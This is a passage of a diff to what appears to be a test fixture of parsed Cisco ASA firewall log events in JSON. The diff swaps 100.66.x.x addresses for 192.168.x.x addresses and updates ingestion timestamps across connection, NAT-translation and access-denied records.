+ "ip": "192.168.198.40"
 },
 "tags": [
 "preserve_original_event"
@@ -5530,7 +5530,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.198.40",
+ "192.168.198.40",
 "172.31.98.44"
 ]
 },
@@ -5539,8 +5539,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-06T20:55:00.164779900Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11787 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1459 (172.31.98.44/1459)",
+ "ingested": "2021-12-09T13:33:41.995125500Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11787 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1459 (172.31.98.44/1459)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -5556,7 +5556,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 80,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.198.40",
+ "mapped_source_ip": "192.168.198.40",
 "connection_id": "11787",
 "source_interface": "outside",
 "mapped_destination_port": 1459
@@ -5578,8 +5578,8 @@
 },
 "source": {
 "port": 53,
- "address": "100.66.1.107",
- "ip": "100.66.1.107"
+ "address": "192.168.1.107",
+ "ip": "192.168.1.107"
 },
 "tags": [
 "preserve_original_event"
@@ -5614,7 +5614,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.1.107",
+ "192.168.1.107",
 "172.31.98.44"
 ]
 },
@@ -5624,8 +5624,8 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-10-06T20:55:00.164825Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11786 for outside:100.66.1.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 375",
+ "ingested": "2021-12-09T13:33:41.995132200Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11786 for outside:192.168.1.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 375",
 "code": "302016",
 "kind": "event",
 "start": "2018-10-10T12:34:56.000Z",
@@ -5657,8 +5657,8 @@
 },
 "destination": {
 "port": 8273,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
 },
 "source": {
 "port": 1460,
@@ -5698,7 +5698,7 @@
 ],
 "ip": [
 "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
 ]
 },
 "host": {
@@ -5706,8 +5706,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-06T20:55:00.164835500Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1460 to outside:100.66.98.44/8273",
+ "ingested": "2021-12-09T13:33:41.995138500Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273",
 "code": "305011",
 "kind": "event",
 "action": "firewall-rule",
@@ -5740,8 +5740,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.192.44",
- "ip": "100.66.192.44"
+ "address": "192.168.192.44",
+ "ip": "192.168.192.44"
 },
 "tags": [
 "preserve_original_event"
@@ -5776,7 +5776,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.192.44",
+ "192.168.192.44",
 "172.31.98.44"
 ]
 },
@@ -5785,8 +5785,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-06T20:55:00.164841700Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11788 for outside:100.66.192.44/80 (100.66.192.44/80) to inside:172.31.98.44/1460 (172.31.98.44/1460)",
+ "ingested": "2021-12-09T13:33:41.995144200Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11788 for outside:192.168.192.44/80 (192.168.192.44/80) to inside:172.31.98.44/1460 (172.31.98.44/1460)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -5802,7 +5802,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 80,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.192.44",
+ "mapped_source_ip": "192.168.192.44",
 "connection_id": "11788",
 "source_interface": "outside",
 "mapped_destination_port": 1460
@@ -5840,8 +5840,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-06T20:55:00.164850400Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1454 to outside:100.66.98.44/8267 duration 0:00:30",
+ "ingested": "2021-12-09T13:33:41.995149800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267 duration 0:00:30",
 "code": "305012",
 "kind": "event",
 "action": "firewall-rule",
@@ -5866,8 +5866,8 @@
 },
 "destination": {
 "port": 8277,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
 },
 "source": {
 "port": 1385,
@@ -5907,7 +5907,7 @@
 ],
 "ip": [
 "172.31.156.80",
- "100.66.98.44"
+ "192.168.98.44"
 ]
 },
 "host": {
@@ -5915,8 +5915,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-06T20:55:00.164855200Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1385 to outside:100.66.98.44/8277",
+ "ingested": "2021-12-09T13:33:41.995154500Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1385 to outside:192.168.98.44/8277",
 "code": "305011",
 "kind": "event",
 "action": "firewall-rule",
@@ -5949,8 +5949,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.19.254",
- "ip": "100.66.19.254"
+ "address": "192.168.19.254",
+ "ip": "192.168.19.254"
 },
 "tags": [
 "preserve_original_event"
@@ -5985,7 +5985,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.19.254",
+ "192.168.19.254",
 "172.31.156.80"
 ]
 },
@@ -5994,8 +5994,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-06T20:55:00.164860300Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11797 for outside:100.66.19.254/80 (100.66.19.254/80) to inside:172.31.156.80/1385 (172.31.156.80/1385)",
+ "ingested": "2021-12-09T13:33:41.995159900Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11797 for outside:192.168.19.254/80 (192.168.19.254/80) to inside:172.31.156.80/1385 (172.31.156.80/1385)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -6011,7 +6011,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 80,
 "mapped_destination_ip": "172.31.156.80",
- "mapped_source_ip": "100.66.19.254",
+ "mapped_source_ip": "192.168.19.254",
 "connection_id": "11797",
 "source_interface": "outside",
 "mapped_destination_port": 1385
@@ -6049,8 +6049,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-06T20:55:00.164865800Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1455 to outside:100.66.98.44/8268 duration 0:00:30",
+ "ingested": "2021-12-09T13:33:41.995166300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268 duration 0:00:30",
 "code": "305012",
 "kind": "event",
 "action": "firewall-rule",
@@ -6096,8 +6096,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-06T20:55:00.164870700Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1456 to outside:100.66.98.44/8269 duration 0:00:30",
+ "ingested": "2021-12-09T13:33:41.995170900Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269 duration 0:00:30",
 "code": "305012",
 "kind": "event",
 "action": "firewall-rule",
@@ -6143,8 +6143,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-06T20:55:00.164877500Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1457 to outside:100.66.98.44/8270 duration 0:00:30",
+ "ingested": "2021-12-09T13:33:41.995176200Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270 duration 0:00:30",
 "code": "305012",
 "kind": "event",
 "action": "firewall-rule",
@@ -6190,8 +6190,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-06T20:55:00.164885500Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1458 to outside:100.66.98.44/8271 duration 0:00:30",
+ "ingested": "2021-12-09T13:33:41.995182500Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271 duration 0:00:30",
 "code": "305012",
 "kind": "event",
 "action": "firewall-rule",
@@ -6237,8 +6237,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-06T20:55:00.164893400Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1459 to outside:100.66.98.44/8272 duration 0:00:30",
+ "ingested": "2021-12-09T13:33:41.995187600Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272 duration 0:00:30",
 "code": "305012",
 "kind": "event",
 "action": "firewall-rule",
@@ -6284,8 +6284,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-06T20:55:00.164901200Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1460 to outside:100.66.98.44/8273 duration 0:00:30",
+ "ingested": "2021-12-09T13:33:41.995193Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273 duration 0:00:30",
 "code": "305012",
 "kind": "event",
 "action": "firewall-rule",
@@ -6315,8 +6315,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.115.46",
- "ip": "100.66.115.46"
+ "address": "192.168.115.46",
+ "ip": "192.168.115.46"
 },
 "tags": [
 "preserve_original_event"
@@ -6351,7 +6351,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.115.46",
+ "192.168.115.46",
 "172.31.156.80"
 ]
 },
@@ -6362,8 +6362,8 @@
 "severity": 6,
 "duration": 325000000000,
 "reason": "TCP FINs",
- "ingested": "2021-10-06T20:55:00.164908400Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11564 for outside:100.66.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs",
+ "ingested": "2021-12-09T13:33:41.995197700Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11564 for outside:192.168.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs",
 "code": "302014",
 "kind": "event",
 "start": "2018-10-10T12:29:31.000Z",
@@ -6400,8 +6400,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.19.254",
- "ip": "100.66.19.254"
+ "address": "192.168.19.254",
+ "ip": "192.168.19.254"
 },
 "tags": [
 "preserve_original_event"
@@ -6436,7 +6436,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.19.254",
+ "192.168.19.254",
 "172.31.156.80"
 ]
 },
@@ -6447,8 +6447,8 @@
 "severity": 6,
 "duration": 0,
 "reason": "TCP Reset-I",
- "ingested": "2021-10-06T20:55:00.164912500Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11797 for outside:100.66.19.254/80 to inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I",
+ "ingested": "2021-12-09T13:33:41.995203100Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11797 for outside:192.168.19.254/80 to inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I",
 "code": "302014",
 "kind": "event",
 "start": "2018-10-10T12:34:56.000Z",
@@ -6480,8 +6480,8 @@
 },
 "destination": {
 "port": 8278,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
 },
 "source": {
 "port": 1386,
@@ -6521,7 +6521,7 @@
 ],
 "ip": [
 "172.31.156.80",
- "100.66.98.44"
+ "192.168.98.44"
 ]
 },
 "host": {
@@ -6529,8 +6529,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-06T20:55:00.164918Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1386 to outside:100.66.98.44/8278",
+ "ingested": "2021-12-09T13:33:41.995209500Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1386 to outside:192.168.98.44/8278",
 "code": "305011",
 "kind": "event",
 "action": "firewall-rule",
@@ -6563,8 +6563,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.115.46",
- "ip": "100.66.115.46"
+ "address": "192.168.115.46",
+ "ip": "192.168.115.46"
 },
 "tags": [
 "preserve_original_event"
@@ -6599,7 +6599,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.115.46",
+ "192.168.115.46",
 "172.31.156.80"
 ]
 },
@@ -6608,8 +6608,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-06T20:55:00.164923200Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11798 for outside:100.66.115.46/80 (100.66.115.46/80) to inside:172.31.156.80/1386 (172.31.156.80/1386)",
+ "ingested": "2021-12-09T13:33:41.995215800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11798 for outside:192.168.115.46/80 (192.168.115.46/80) to inside:172.31.156.80/1386 (172.31.156.80/1386)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -6625,7 +6625,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 80,
 "mapped_destination_ip": "172.31.156.80",
- "mapped_source_ip": "100.66.115.46",
+ "mapped_source_ip": "192.168.115.46",
 "connection_id": "11798",
 "source_interface": "outside",
 "mapped_destination_port": 1386
@@ -6647,8 +6647,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.19.254",
- "ip": "100.66.19.254"
+ "address": "192.168.19.254",
+ "ip": "192.168.19.254"
 },
 "tags": [
 "preserve_original_event"
@@ -6682,7 +6682,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.19.254",
+ "192.168.19.254",
 "172.31.98.44"
 ]
 },
@@ -6691,8 +6691,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:55:00.164927900Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:33:41.995222500Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -6728,8 +6728,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.19.254",
- "ip": "100.66.19.254"
+ "address": "192.168.19.254",
+ "ip": "192.168.19.254"
 },
 "tags": [
 "preserve_original_event"
@@ -6763,7 +6763,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.19.254",
+ "192.168.19.254",
 "172.31.98.44"
 ]
 },
@@ -6772,8 +6772,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:55:00.164933600Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:33:41.995229300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -6809,8 +6809,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.19.254",
- "ip": "100.66.19.254"
+ "address": "192.168.19.254",
+ "ip": "192.168.19.254"
 },
 "tags": [
 "preserve_original_event"
@@ -6844,7 +6844,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.19.254",
+ "192.168.19.254",
 "172.31.98.44"
 ]
 },
@@ -6853,8 +6853,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:55:00.164938300Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:33:41.995235600Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -6890,8 +6890,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.19.254",
- "ip": "100.66.19.254"
+ "address": "192.168.19.254",
+ "ip": "192.168.19.254"
 },
 "tags": [
 "preserve_original_event"
@@ -6925,7 +6925,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.19.254",
+ "192.168.19.254",
 "172.31.98.44"
 ]
 },
@@ -6934,8 +6934,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:55:00.164943100Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:33:41.995241900Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -6971,8 +6971,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.19.254",
- "ip": "100.66.19.254"
+ "address": "192.168.19.254",
+ "ip": "192.168.19.254"
 },
 "tags": [
 "preserve_original_event"
@@ -7006,7 +7006,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.19.254",
+ "192.168.19.254",
 "172.31.98.44"
 ]
 },
@@ -7015,8 +7015,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:55:00.164947200Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:33:41.995248200Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -7052,8 +7052,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.19.254",
- "ip": "100.66.19.254"
+ "address": "192.168.19.254",
+ "ip": "192.168.19.254"
 },
 "tags": [
 "preserve_original_event"
@@ -7087,7 +7087,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.19.254",
+ "192.168.19.254",
 "172.31.98.44"
 ]
 },
@@ -7096,8 +7096,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:55:00.164953100Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:33:41.995254300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -7133,8 +7133,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.19.254",
- "ip": "100.66.19.254"
+ "address": "192.168.19.254",
+ "ip": "192.168.19.254"
 },
 "tags": [
 "preserve_original_event"
@@ -7168,7 +7168,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.19.254",
+ "192.168.19.254",
 "172.31.98.44"
 ]
 },
@@ -7177,8 +7177,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:55:00.164958900Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:33:41.995260900Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -7214,8 +7214,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.19.254",
- "ip": "100.66.19.254"
+ "address": "192.168.19.254",
+ "ip": "192.168.19.254"
 },
 "tags": [
 "preserve_original_event"
@@ -7249,7 +7249,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.19.254",
+ "192.168.19.254",
 "172.31.98.44"
 ]
 },
@@ -7258,8 +7258,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:55:00.164963800Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:33:41.995267200Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -7295,8 +7295,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.19.254",
- "ip": "100.66.19.254"
+ "address": "192.168.19.254",
+ "ip": "192.168.19.254"
 },
 "tags": [
 "preserve_original_event"
@@ -7330,7 +7330,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.19.254",
+ "192.168.19.254",
 "172.31.98.44"
 ]
 },
@@ -7339,8 +7339,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.164970900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.995273600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7376,8 +7376,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7411,7 +7411,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -7420,8 +7420,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.164978800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.995280Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7457,8 +7457,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7492,7 +7492,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, 
@@ -7501,8 +7501,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.164986Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.995287300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7538,8 +7538,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7573,7 +7573,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -7582,8 +7582,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.164992100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.995291600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7619,8 +7619,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7654,7 +7654,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, 
@@ -7663,8 +7663,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.164998200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.995296600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7695,8 +7695,8 @@ }, "destination": { "port": 8279, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1275, @@ -7736,7 +7736,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -7744,8 +7744,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165005100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1275 to outside:100.66.98.44/8279", + "ingested": "2021-12-09T13:33:41.995303600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1275 to outside:192.168.98.44/8279", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -7778,8 +7778,8 